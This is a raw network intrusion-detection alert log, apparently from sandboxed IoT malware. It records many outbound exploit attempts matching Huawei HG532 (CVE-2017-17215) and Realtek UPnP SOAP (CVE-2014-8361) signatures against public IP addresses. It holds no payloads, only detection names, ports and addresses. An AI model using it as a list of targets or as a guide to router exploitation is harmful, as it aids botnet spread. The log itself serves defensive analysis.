                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297837215192.168.2.23206.176.8.137
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667037215192.168.2.23209.48.250.210
                                      07/20/24-23:01:42.571884TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24709852869192.168.2.23172.43.240.212
                                      07/20/24-23:01:08.623583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3367052869192.168.2.23164.251.43.137
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595237215192.168.2.23197.186.193.196
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067637215192.168.2.2341.33.160.160
                                      07/20/24-23:01:02.048214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699237215192.168.2.2341.12.247.120
                                      07/20/24-23:01:46.755168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615264852869192.168.2.23187.223.52.236
                                      07/20/24-23:01:54.153862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5535852869192.168.2.2334.139.90.241
                                      07/20/24-23:02:48.447182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616045652869192.168.2.2320.185.209.150
                                      07/20/24-23:01:20.132511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790637215192.168.2.2341.11.151.145
                                      07/20/24-23:01:31.327539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23775452869192.168.2.23174.98.46.120
                                      07/20/24-23:01:43.555540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23499452869192.168.2.2339.189.20.84
                                      07/20/24-23:01:00.638305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895637215192.168.2.2341.95.27.201
                                      07/20/24-23:01:06.994337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157637215192.168.2.23216.111.45.230
                                      07/20/24-23:01:45.540580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5382252869192.168.2.23156.192.144.142
                                      07/20/24-23:01:08.620788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26070252869192.168.2.23186.129.229.179
                                      07/20/24-23:01:08.572556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25412452869192.168.2.23143.254.34.7
                                      07/20/24-23:01:44.491962TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25465452869192.168.2.23143.254.203.194
                                      07/20/24-23:01:41.722161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542852869192.168.2.2318.13.209.238
                                      07/20/24-23:01:44.926055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25410852869192.168.2.23159.4.8.31
                                      07/20/24-23:01:50.280308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4291452869192.168.2.2318.202.42.80
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426037215192.168.2.2325.6.33.130
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.23178.28.45.219
                                      07/20/24-23:01:49.170008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5065652869192.168.2.23179.176.134.213
                                      07/20/24-23:01:04.014689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488837215192.168.2.23157.42.165.86
                                      07/20/24-23:01:42.374543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614904452869192.168.2.2380.70.75.159
                                      07/20/24-23:01:53.625101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4576252869192.168.2.23122.78.135.79
                                      07/20/24-23:00:59.154067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725637215192.168.2.23157.43.107.32
                                      07/20/24-23:01:42.637859TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25731252869192.168.2.2378.5.59.56
                                      07/20/24-23:01:42.924014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708052869192.168.2.2312.110.126.98
                                      07/20/24-23:01:42.632446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5076652869192.168.2.23149.51.58.185
                                      07/20/24-23:01:47.420081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25135452869192.168.2.23114.188.204.238
                                      07/20/24-23:01:46.064501TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5970252869192.168.2.2336.185.15.35
                                      07/20/24-23:01:12.853279TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24136052869192.168.2.23164.126.39.49
                                      07/20/24-23:01:48.080190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3727252869192.168.2.23124.255.77.181
                                      07/20/24-23:02:00.651394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3294452869192.168.2.23186.13.149.1
                                      07/20/24-23:01:41.156801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200452869192.168.2.2380.2.7.209
                                      07/20/24-23:01:41.426681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613740052869192.168.2.2364.123.182.34
                                      07/20/24-23:01:44.706302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5826652869192.168.2.23163.47.80.71
                                      07/20/24-23:01:48.255782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3705452869192.168.2.2338.115.164.104
                                      07/20/24-23:01:41.378556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615671452869192.168.2.2361.42.34.219
                                      07/20/24-23:01:43.977046TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25852052869192.168.2.2379.130.195.101
                                      07/20/24-23:02:08.291319TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24170452869192.168.2.23140.127.134.199
                                      07/20/24-23:00:59.154067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745037215192.168.2.23143.28.80.1
                                      07/20/24-23:03:46.099099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3936252869192.168.2.23168.71.222.184
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205637215192.168.2.2360.14.209.187
                                      07/20/24-23:01:44.831437TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25157052869192.168.2.23172.247.8.242
                                      07/20/24-23:01:24.876437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329237215192.168.2.2341.124.8.177
                                      07/20/24-23:01:46.495508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292652869192.168.2.2344.152.141.175
                                      07/20/24-23:01:10.641552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758252869192.168.2.232.129.228.59
                                      07/20/24-23:01:25.383450TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875052869192.168.2.23186.254.145.51
                                      07/20/24-23:01:47.359862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23619652869192.168.2.23221.195.227.25
                                      07/20/24-23:01:43.621955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5932452869192.168.2.23157.142.102.71
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870037215192.168.2.2341.8.18.232
                                      07/20/24-23:01:27.730585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196837215192.168.2.23197.113.144.195
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935037215192.168.2.23109.129.243.233
                                      07/20/24-23:01:55.273926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613679252869192.168.2.2318.137.178.82
                                      07/20/24-23:01:42.616434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3864852869192.168.2.2397.65.172.105
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.23157.249.222.130
                                      07/20/24-23:01:42.151857TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613634252869192.168.2.23181.21.97.146
                                      07/20/24-23:01:50.798234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25390452869192.168.2.23144.196.193.162
                                      07/20/24-23:01:45.072641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5063252869192.168.2.23149.136.40.221
                                      07/20/24-23:01:14.152613TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615072652869192.168.2.231.209.93.74
                                      07/20/24-23:01:20.601040TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23425052869192.168.2.2361.157.174.11
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214637215192.168.2.2351.142.141.117
                                      07/20/24-23:02:11.947779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532252869192.168.2.2359.213.19.147
                                      07/20/24-23:01:13.299019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542652869192.168.2.23191.208.79.121
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187637215192.168.2.23157.212.249.90
                                      07/20/24-23:00:59.161892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563437215192.168.2.23197.19.12.241
                                      07/20/24-23:01:04.085431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623837215192.168.2.2341.206.146.166
                                      07/20/24-23:01:45.108910TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613611052869192.168.2.23203.219.226.207
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059637215192.168.2.2341.129.34.41
                                      07/20/24-23:01:04.039129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502637215192.168.2.23197.84.99.94
                                      07/20/24-23:01:51.888686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596652869192.168.2.23116.126.39.243
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658237215192.168.2.23157.238.18.41
                                      07/20/24-23:01:46.359091TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613541452869192.168.2.2371.66.59.209
                                      07/20/24-23:01:11.630572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372037215192.168.2.2341.206.63.145
                                      07/20/24-23:01:42.812448TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614336252869192.168.2.23119.167.95.17
                                      07/20/24-23:01:52.582295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5423252869192.168.2.23129.189.126.127
                                      07/20/24-23:01:52.940746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615354852869192.168.2.23221.3.151.48
                                      07/20/24-23:01:10.610618TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613970052869192.168.2.23213.27.181.202
                                      07/20/24-23:01:24.790282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873652869192.168.2.23108.240.199.7
                                      07/20/24-23:01:49.463055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5258252869192.168.2.23190.134.62.33
                                      07/20/24-23:01:31.978142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130637215192.168.2.23157.174.110.166
                                      07/20/24-23:01:00.633385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538437215192.168.2.23157.243.7.84
                                      07/20/24-23:01:42.758824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613501052869192.168.2.23213.132.50.155
                                      07/20/24-23:01:42.399678TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23844452869192.168.2.23115.35.192.158
                                      07/20/24-23:01:57.518588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524252869192.168.2.23139.3.200.28
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.2341.152.253.87
                                      07/20/24-23:01:08.668802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3825652869192.168.2.23205.187.52.139
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368437215192.168.2.23157.33.11.159
                                      07/20/24-23:02:01.526784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24899852869192.168.2.2397.69.50.199
                                      07/20/24-23:01:47.420081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365452869192.168.2.2343.229.235.45
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469437215192.168.2.2341.47.64.65
                                      07/20/24-23:01:44.019540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4475052869192.168.2.23179.32.230.224
                                      07/20/24-23:01:57.313050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3914252869192.168.2.2391.195.20.9
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.2341.212.31.237
                                      07/20/24-23:01:11.631549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049237215192.168.2.23197.217.206.213
                                      07/20/24-23:01:42.702731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013452869192.168.2.23126.163.211.196
                                      07/20/24-23:02:20.433035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615436652869192.168.2.2380.255.88.144
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.2341.197.138.116
                                      07/20/24-23:01:45.010540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353652869192.168.2.2317.241.55.92
                                      07/20/24-23:01:20.175900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805837215192.168.2.2377.95.4.242
                                      07/20/24-23:01:02.132906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4195452869192.168.2.23108.144.159.228
                                      07/20/24-23:01:42.800583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4109252869192.168.2.23167.73.249.89
                                      07/20/24-23:02:01.761996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5740852869192.168.2.23105.47.109.140
                                      07/20/24-23:01:46.520663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615041852869192.168.2.23172.247.8.242
                                      07/20/24-23:01:54.914948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23613652869192.168.2.23191.208.197.76
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308837215192.168.2.23198.69.140.160
                                      07/20/24-23:01:42.603963TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613351452869192.168.2.23168.75.18.77
                                      07/20/24-23:01:55.666677TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24432652869192.168.2.23168.75.31.114
                                      07/20/24-23:01:07.004906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.2341.233.112.193
                                      07/20/24-23:01:14.097135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688837215192.168.2.23157.209.127.80
                                      07/20/24-23:00:57.221090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272837215192.168.2.23125.230.182.28
                                      07/20/24-23:01:20.593640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25760652869192.168.2.23136.56.196.147
                                      07/20/24-23:01:46.092258TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25664252869192.168.2.2388.29.47.240
                                      07/20/24-23:01:56.300735TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3804652869192.168.2.23183.120.27.200
                                      07/20/24-23:01:44.533289TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614352852869192.168.2.2337.247.244.116
                                      07/20/24-23:01:03.970797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615204252869192.168.2.2375.16.13.92
                                      07/20/24-23:01:08.614193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25484852869192.168.2.2345.158.122.120
                                      07/20/24-23:02:04.767225TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3373452869192.168.2.2372.182.239.64
                                      07/20/24-23:01:45.967403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4834252869192.168.2.23158.240.85.125
                                      07/20/24-23:01:45.716157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614252869192.168.2.2346.179.46.173
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408237215192.168.2.23129.251.133.85
                                      07/20/24-23:01:08.631492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4090052869192.168.2.23216.151.5.50
                                      07/20/24-23:01:47.572503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24626852869192.168.2.23169.195.139.119
                                      07/20/24-23:01:42.522141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23298052869192.168.2.23125.128.111.151
                                      07/20/24-23:02:00.866395TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614059852869192.168.2.23209.114.160.105
                                      07/20/24-23:01:00.634089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511037215192.168.2.23157.73.230.79
                                      07/20/24-23:01:34.044293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077637215192.168.2.23157.116.8.136
                                      07/20/24-23:01:04.240033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849637215192.168.2.2332.245.170.235
                                      07/20/24-23:01:34.043865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855037215192.168.2.23157.8.209.32
                                      07/20/24-23:01:41.258057TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615376252869192.168.2.23221.103.3.16
                                      07/20/24-23:01:46.019511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3354252869192.168.2.23164.28.92.86
                                      07/20/24-23:01:00.633295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792637215192.168.2.23157.32.103.4
                                      07/20/24-23:01:46.092258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3421852869192.168.2.2336.12.14.153
                                      07/20/24-23:02:07.984371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594252869192.168.2.23157.76.157.173
                                      07/20/24-23:01:14.100332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761437215192.168.2.2354.24.241.219
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665637215192.168.2.23157.47.11.186
                                      07/20/24-23:01:52.720668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3628652869192.168.2.23210.199.180.209
                                      07/20/24-23:01:41.293630TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613654852869192.168.2.23118.3.222.239
                                      07/20/24-23:01:08.559170TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24637252869192.168.2.23148.117.206.184
                                      07/20/24-23:01:20.603553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26029852869192.168.2.2352.234.117.101
                                      07/20/24-23:01:58.301558TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614810652869192.168.2.23167.172.23.251
                                      07/20/24-23:02:00.725615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5494252869192.168.2.23157.156.14.69
                                      07/20/24-23:01:43.087294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4183652869192.168.2.23183.141.159.182
                                      07/20/24-23:01:52.684763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613524852869192.168.2.2317.121.90.69
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254037215192.168.2.2341.119.179.108
                                      07/20/24-23:01:40.279669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006437215192.168.2.23157.182.220.13
                                      07/20/24-23:01:43.994703TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4000652869192.168.2.2342.169.174.111
                                      07/20/24-23:02:06.689806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614196852869192.168.2.2335.30.208.203
                                      07/20/24-23:01:45.731228TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23548252869192.168.2.23222.131.76.141
                                      07/20/24-23:01:24.707761TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613354452869192.168.2.2340.226.47.93
                                      07/20/24-23:02:14.686790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5540052869192.168.2.2314.149.133.62
                                      07/20/24-23:01:14.049603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060837215192.168.2.23157.40.217.143
                                      07/20/24-23:01:02.045831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576437215192.168.2.23197.235.104.194
                                      07/20/24-23:01:42.898615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569252869192.168.2.23142.238.177.84
                                      07/20/24-23:01:43.944379TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23958852869192.168.2.23176.130.206.241
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835237215192.168.2.2320.109.185.247
                                      07/20/24-23:01:42.297644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3301252869192.168.2.23104.116.61.223
                                      07/20/24-23:00:57.221748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945637215192.168.2.2357.35.73.126
                                      07/20/24-23:01:51.063023TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25181052869192.168.2.23133.103.41.145
                                      07/20/24-23:01:57.269160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3470252869192.168.2.23185.209.39.214
                                      07/20/24-23:01:14.103467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918037215192.168.2.23197.49.55.120
                                      07/20/24-23:01:44.658614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966452869192.168.2.23143.69.193.236
                                      07/20/24-23:01:51.021834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615230852869192.168.2.23132.12.76.39
                                      07/20/24-23:01:31.322288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199652869192.168.2.23115.28.108.81
                                      07/20/24-23:01:08.646615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23294052869192.168.2.23147.69.83.159
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186237215192.168.2.2341.83.208.105
                                      07/20/24-23:01:46.520663TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25200252869192.168.2.2341.250.44.72
                                      07/20/24-23:01:01.818567TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616020052869192.168.2.2325.222.248.206
                                      07/20/24-23:00:57.221727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.23157.6.221.99
                                      07/20/24-23:00:57.221790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384237215192.168.2.23197.55.83.122
                                      07/20/24-23:01:43.946380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5015652869192.168.2.23114.188.204.238
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926837215192.168.2.2341.224.244.226
                                      07/20/24-23:02:10.632121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5746252869192.168.2.23113.241.33.36
                                      07/20/24-23:01:42.592141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25358452869192.168.2.23105.155.204.151
                                      07/20/24-23:01:01.799480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047052869192.168.2.2325.158.237.150
